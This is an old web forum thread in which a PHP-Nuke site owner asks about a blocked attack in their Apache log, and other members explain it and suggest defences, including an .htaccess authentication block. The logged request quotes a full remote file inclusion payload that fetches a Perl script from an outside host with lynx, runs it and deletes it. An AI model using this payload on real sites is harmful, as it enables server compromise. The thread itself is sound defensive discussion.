Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
CodyG
Life Cycles Becoming CPU Cycles


Joined: Jan 02, 2003
Posts: 712
Location: Vancouver Island

PostPosted: Tue Jun 20, 2006 12:06 pm Reply with quote

The following is showing up in my apache error_log, over and over and I 'm wondering if someone is trying to exploit my site. They are getting 403s, so that's good, but they are using a lot of different IPs.

Any ideas what this is and how I can stop this kind of stuff from filling up my logs?

[Mon Jun 19 09:13:54 2006] [error] [client 85.25.7.113] mod_security: Access denied with code 403. Pattern match "perl\\\\x20" at ARGS_SELECTIVE [hostname "mydomain.ca"] [uri "/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.exchangechannel.com/welcome/family/php/images/.xpl/cmd.txt?&cmd=cd%20/tmp;lynx%20-source%20http://www.exchangechannel.com/welcome/family/php/images/.xpl/w0w%20>%20w0w;perl%20w0w;rm%20w0w*?"]

_________________
"We want to see if life is ubiquitous." D.Goldin 
View user's profile Send private message
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Tue Jun 20, 2006 3:12 pm Reply with quote

Yes. They are trying to exploit your site. Send a copy of this to the abuse email for the owner of the server. It may be that the site allows uploads, so they might not knowingly be hosting this attack on your site.

This is a standard script kiddie attack that has seen increased activity in recent weeks. You can block it with the current version of NukeSentinel, putting HTTP authentication on your modules/Forums/admin directory, and / or modifying the appropriate phpBB files as I believe Technocrat suggested in the forums here.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
gregexp
The Mouse Is Extension Of Arm


Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

PostPosted: Tue Jun 20, 2006 3:13 pm Reply with quote

looks like an exploit script they are tryin to run on ur site ...good thing it doesnt work...lol

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
CodyG
PostPosted: Tue Jun 20, 2006 8:55 pm Reply with quote

Thanks for the words.

So I can copy the .htaccess and the .staccess currently in root into the forum/admin folder?
 
kguske
PostPosted: Tue Jun 20, 2006 10:05 pm Reply with quote

Not really. You could use the same .staccess, and add a .htaccess to your modules/Forums/admin directory that looks something like (and make a donation to Raven for this since he wrote it):
Code:
<Files .staccess>

  deny from all
</Files>

<Limit GET POST PUT>
   require valid-user
</Limit>
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /path/to/your/.staccess


Where /path/to/your/.staccess is the same as in your Nuke root .htaccess.

Of course, you'll have to enter the HTTP authentication user and password whenever you go to the Forums administration, but so will potential attackers...
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©